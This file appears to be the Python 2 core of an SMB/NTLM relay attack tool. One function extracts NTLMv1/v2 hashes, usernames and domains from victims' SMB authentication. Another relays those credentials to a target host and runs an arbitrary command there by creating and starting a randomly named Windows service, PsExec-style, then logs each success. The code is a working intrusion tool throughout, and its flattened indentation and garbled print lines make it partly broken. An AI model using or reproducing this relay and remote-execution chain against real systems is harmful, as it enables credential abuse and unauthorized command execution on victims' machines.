def ParseHash(data, Client, Target):
try:
lenght = struct.unpack('<H', data[43:45])[0]
LMhashLen = struct.unpack('<H', data[51:53])[0]
NthashLen = struct.unpack('<H', data[53:55])[0]
Bcc = struct.unpack('<H', data[63:65])[0]
if NthashLen >= 30:
Hash = data[65 + LMhashLen:65 + LMhashLen + NthashLen]
pack = tuple(data[89 + NthashLen:].split('\x00\x00\x00'))[:2]
var = [
e.replace('\x00', '')
for e in data[89 + NthashLen:Bcc +
60].split('\x00\x00\x00')[:2]
]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "[+]Auth from user %s with host %s previously failed. Won't relay." % (
Username, Client)
pass
if Username in UserToRelay:
print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s' % (
Client, RunSmbFinger((Client, 445)), Target)
print "Username : "******"Domain (if joined, if not then computer name) : ", Domain
return data[65:65 + LMhashLen], data[
65 + LMhashLen:65 + LMhashLen +
NthashLen], Username, Domain, Client
if NthashLen == 24:
pack = tuple(data[89 + NthashLen:].split('\x00\x00\x00'))[:2]
var = [
e.replace('\x00', '')
for e in data[89 + NthashLen:Bcc +
60].split('\x00\x00\x00')[:2]
]
Username, Domain = tuple(var)
if ReadData("SMBRelay-Session.txt", Client, Username):
print "Auth from user %s with host %s previously failed. Won't relay." % (
Username, Client)
pass
if Username in UserToRelay:
print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s' % (
Client, RunSmbFinger((Client, 445)), Target)
LMHashing = data[65:65 + LMhashLen].encode('hex').upper()
NTHashing = data[65 + LMhashLen:65 + LMhashLen +
NthashLen].encode('hex').upper()
print "Username : "******"Domain (if joined, if not then computer name) : ", Domain
return data[65:65 + LMhashLen], data[
65 + LMhashLen:65 + LMhashLen +
NthashLen], Username, Domain, Client
else:
print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s" % (
Username, UserToRelay)
pass
except Exception:
raise
def RunRelay(host, Command, Domain):
Target = host
CMD = Command
print "Target is running: ", RunSmbFinger((host, 445))
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, 445))
h = SMBHeader(cmd="\x72",
flag1="\x18",
flag2="\x03\xc7",
pid="\xff\xfe",
tid="\xff\xff")
n = SMBNego(Data=SMBNegoData())
n.calculate()
packet0 = str(h) + str(n)
buffer0 = longueur(packet0) + packet0
s.send(buffer0)
data = s.recv(2048)
Key = ParseAnswerKey(data, host)
DomainMachineName = ParseDomain(data)
if data[8:10] == "\x72\x00":
try:
a = SmbRogueSrv139(Key, Target, DomainMachineName)
if a is not None:
LMHash, NTHash, Username, OriginalDomain, CLIENTIP = a
if Domain == None:
Domain = OriginalDomain
if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
pass
else:
head = SMBHeader(cmd="\x73",
flag1="\x18",
flag2="\x03\xc8",
pid="\xff\xfe",
mid="\x01\x00")
t = SMBSessionTreeData(AnsiPasswd=LMHash,
UnicodePasswd=NTHash,
Username=Username,
Domain=Domain,
Targ=Target)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
except:
raise
a = None
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
Logs.info(CLIENTIP + ":" + Username)
if data[8:10] == "\x73\x0d":
print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
Logs.info(CLIENTIP + ":" + Username)
## NtCreateAndx
if data[8:10] == "\x73\x00":
print "[+] Authenticated, trying to PSexec on target !"
head = SMBHeader(cmd="\xa2",
flag1="\x18",
flag2="\x02\x28",
mid="\x03\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBNTCreateData()
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
## DCE/RPC Write.
if data[8:10] == "\xa2\x00":
head = SMBHeader(cmd="\x2f",
flag1="\x18",
flag2="\x05\x28",
mid="\x04\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
x = SMBDCEData()
x.calculate()
f = data[42:44]
t = SMBWriteData(FID=f, Data=x)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",
flag1="\x18",
flag2="\x05\x28",
mid="\x05\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x2f",
flag1="\x18",
flag2="\x05\x28",
mid="\x06\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(
MachineNameRefID="\x00\x00\x03\x00")
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
t = SMBWriteData(FID=f, Data=x)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",
flag1="\x18",
flag2="\x05\x28",
mid="\x07\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCreateService.
if data[8:10] == "\x2e\x00":
if data[len(data) - 4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
print "[+] Creating service"
head = SMBHeader(cmd="\x2f",
flag1="\x18",
flag2="\x05\x28",
mid="\x08\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
ContextHandler = data[88:108]
ServiceNameChars = ''.join([
random.choice(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
) for i in range(11)
])
ServiceIDChars = ''.join([
random.choice(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
) for i in range(16)
])
FileChars = ''.join([
random.choice(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
) for i in range(6)
]) + '.bat'
w = SMBDCESVCCTLCreateService(
ContextHandle=ContextHandler,
ServiceName=ServiceNameChars,
DisplayNameID=ServiceIDChars,
ReferentID="\x21\x03\x03\x00",
BinCMD=CMD)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00", Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",
FID=f,
Data=x)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",
flag1="\x18",
flag2="\x05\x28",
mid="\x09\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBReadData(FID=f,
MaxCountLow="\x40\x02",
MinCount="\x40\x02",
Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x2e\x00":
if data[len(data) - 4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service"
head = SMBHeader(cmd="\x2f",
flag1="\x18",
flag2="\x05\x28",
mid="\x0a\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
w = SMBDCESVCCTLOpenService(
ContextHandle=ContextHandler,
ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00", Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",
FID=f,
Data=x)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",
flag1="\x18",
flag2="\x05\x28",
mid="\x0b\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBReadData(FID=f,
MaxCountLow="\x40\x02",
MinCount="\x40\x02",
Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x2e\x00":
if data[len(data) -
4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service"
ContextHandler = data[88:108]
head = SMBHeader(cmd="\x2f",
flag1="\x18",
flag2="\x05\x28",
mid="\x0a\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
w = SMBDCESVCCTLStartService(
ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",
Data=w)
x.calculate()
t = SMBWriteData(
Offset="\x9f\x01\x00\x00",
FID=f,
Data=x)
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",
flag1="\x18",
flag2="\x05\x28",
mid="\x0b\x00",
pid=data[30:32],
uid=data[32:34],
tid=data[28:30])
t = SMBReadData(
FID=f,
MaxCountLow="\x40\x02",
MinCount="\x40\x02",
Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head) + str(t)
buffer1 = longueur(
packet0) + packet0
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x2e\x00":
print "[+] Command successful !"
Logs.info(
'Command successful:')
Logs.info(Target + "," +
Username + ',' + CMD)
return True
if data[8:10] != "\x2e\x00":
return False